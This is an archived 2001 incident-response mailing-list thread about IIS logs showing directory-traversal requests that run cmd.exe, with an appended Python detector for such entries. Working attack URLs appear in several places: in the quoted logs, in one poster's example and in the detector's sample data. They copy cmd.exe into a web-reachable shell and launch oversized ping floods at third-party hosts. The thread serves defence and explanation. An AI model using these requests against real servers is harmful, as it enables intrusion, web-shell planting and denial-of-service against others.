I've found that if the '-n' argument is set extremely high in the ping
command, W3SVC adds a line to Event Viewer stating that the script had
timed out. For example, the following request:

  /scripts/..%5c..%5cwinnt/system32/cmd.exe?+/c+ping+-n+120000+-l+65411+-w+130+-v+107+123.123.123.123

would generate an event such as this:

  The script started from the URL '/scripts/..%5c..%5cwinnt/system32/cmd.exe'
  with parameters '/c+ping+-n+120000+-l+65411+-w+130+-v+107+123.123.123.123'
  has not responded within the configured timeout period. The HTTP server
  is terminating the script.

Blake
=================================================================
The Government, like diapers, should be replaced regularly, and often
for the same reasons.

On Tue, 10 Jul 2001, Jordan K Wiens wrote:

> No, a 502 error is a bad gateway error; what happens is that your IIS
> server is unpatched against the Unicode exploits (one of them, at least) and
> is executing the command to ping a host. Just recently there seems to be
> an increase in the number of hackers using vulnerable web servers for DDoS
> like behavior using over-sized pings.
>
> When the ping command executes, it runs the pings; however, it (obviously)
> does not return complete HTML headers as its output (since ping was never
> meant to run via the web, it's not supposed to run like a normal web
> executable). IIS notices this, and realizes that the script hasn't
> correctly executed, and lets you know with the 502 error. If you actually
> look at the page, the results would read something like: "502 error; the
> application has not returned correct headers. The headers it did return
> are:" and then IIS would proceed to show the output of whatever had been
> shown.
>
> The error you want to see once a machine has been fully patched is usually
> a 404 error.
>
> --
> Jordan Wiens
> UF Network Incident Response Team
> (352)392-2061
>
> On Tue, 10 Jul 2001 myrddin_eat_private wrote:
>
> > Would like someone to help me understand what is going on here... The 502
> > error at the end of these entries would indicate failures, wouldn't
> > they? I've been all through the logs on this box, and even though at every
> > attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe
> > shows a 502, it is there.
> >
> > I'm looking at the times on the log entries and guessing that this was a
> > manual attack.
> >
> > Also, can someone please explain what is being attempted with these pings?
> > aaa.aaa.aaa.aaa
> > bbb.bbb.bbb.bbb
> > ccc.ccc.ccc.ccc.ccc
> > ddd.ddd.ddd.ddd.ddd
> > are all unique addresses.
> >
> > #Software: Microsoft Internet Information Services 5.0
> > #Version: 1.0
> > #Date: 2001-06-19 18:44:15
> > #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
> > 2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
> > 2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
> > 2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd 502 -

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service. For more
information on this free incident handling, management and tracking system
please see: http://aris.securityfocus.com
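A log detector for the entries quoted in the thread, added here as an example and not code from any of the posters: it parses the IIS 5.0 W3C extended format using the #Fields header, flags every request that reaches cmd.exe through '..' traversal regardless of the 502 (which, as Jordan explains, only means the command returned no HTTP headers, not that it failed), and pulls the ping count, packet size and target out of the query string. The sample log is constructed from the posted entries plus Blake's request; the 2001-07-10 timestamps, the eee.eee.eee.eee address and the benign /default.htm line are assumptions.

```python
from urllib.parse import unquote_plus

# Constructed sample in IIS 5.0 W3C extended log format, built from the entries
# quoted in the thread (placeholder addresses as in the original post). The
# 2001-07-10 lines are assumed: Blake's request rewritten as a log entry, and
# one benign request from an assumed client eee.eee.eee.eee.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-06-19 18:44:15
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
2001-07-10 09:15:02 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+ping+-n+120000+-l+65411+-w+130+-v+107+123.123.123.123 502 -
2001-07-10 09:16:40 eee.eee.eee.eee - bbb.bbb.bbb.bbb 80 GET /default.htm - 200 Mozilla/4.0+(compatible)
"""


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = []
    for raw in text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split(":", 1)[1].split()
        elif raw and not raw.startswith("#"):
            values = raw.split()  # IIS writes spaces inside a field as '+'
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def classify(entry):
    """Return a finding if cmd.exe was reached through '..' traversal, else None.

    sc-status is recorded but never used as a filter: a 502 here only says the
    spawned command returned no HTTP headers, not that it did not run."""
    stem = unquote_plus(entry["cs-uri-stem"]).replace("\\", "/").lower()
    if ".." not in stem or not stem.endswith("cmd.exe"):
        return None
    args = unquote_plus(entry["cs-uri-query"]).split()  # '+' and %20 separate args
    finding = {"time": entry["time"], "src": entry["c-ip"], "status": entry["sc-status"],
               "kind": "command", "cmd": " ".join(args)}
    if "ping" in args:
        opts = args[args.index("ping") + 1:]
        finding.update(kind="ping-flood", target=opts[-1])
        for flag, key in (("-n", "count"), ("-l", "size")):
            pos = opts.index(flag) + 1 if flag in opts else len(opts)
            if pos < len(opts) and opts[pos].isdigit():
                finding[key] = int(opts[pos])
    elif "copy" in args:
        finding["kind"] = "shell-copy"
    return finding


def scan(text):
    """Run classify() over every request line; findings come back in log order."""
    return [f for f in map(classify, parse_w3c(text)) if f]
```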
This archive was generated by hypermail 2b30 : Wed Jul 11 2001 - 13:26:55 PDT